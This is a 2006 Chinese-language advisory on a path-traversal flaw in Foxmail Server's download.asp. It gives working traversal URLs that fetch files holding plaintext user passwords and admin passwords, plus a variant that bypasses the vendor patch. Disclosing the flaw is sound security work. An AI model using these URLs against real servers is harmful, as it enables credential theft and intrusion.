Foxmail Server download.asp可下载任意文件漏洞

zyp

文章作者：肉丝<br/>信息来源：网安阵线（www.nspcn.org）<br/><br/>发布日期:2006.7.5<br/><br/>受影响版本：<br/>Foxmail Server 2.0及以前所有版本(利用方式不一样)<br/><br/>描述：<br/>Foxmail Server针对国内的中心企业用户，提供多种邮件服务，包括SMTP、POP3，内建邮件扩充协议MIME，用户可以根据使用习惯以Foxmail、Outlook Express等流行客户端软件收发邮件，也可以在美观亲切易用的全中文Web浏览器界面上登陆处理邮件。<br/><br/>user/download.asp文件没有filePath和fileName进行过滤,导致匿名用户可以构造任意ilePath和fileName任意值下载Foxmail Server安装分区上任意文件.<br/><br/>测试办法:<br/>下载用户配置文件,用户名和密码均是明文显示,用记事本打开<br/><br/><br/>http://www.target.com/user/download.asp?filename=MtaUsers.dat&amp;filepath=../../Users/<br/>下载系统配置文件,里面有域密码和管理员密码<br/><br/><br/>http://www.target.com/user/download.asp?filename=MtaSys.dat&amp;filepath=../../Users/<br/>管理员登陆界面:<br/>http://www.target.com/admin<br/><br/>域管理员登陆界面<br/>http://www.target.com//sysAdmin<br/><br/><br/>官方已经推出补丁,下载地址:http://www.foxmail.com.cn/doanload/webdownload.rar. 但过滤得不彻底,拒绝的匿名用户的下载权限.但是,如果有一个合法帐号,照样可以下载分区上任意文件.<br/><br/>利用方法:<br/><br/><br/>http://www.target.com/user/download.asp?filename=MtaUsers.dat&amp;filepath=../../webuser/target%20com/username/../../../Users/<br/><br/>http://www.target.com/user/download.asp?filename=MtaSys.dat&amp;filepath=../../webuser/target%20com/username/../../../Users/<br/>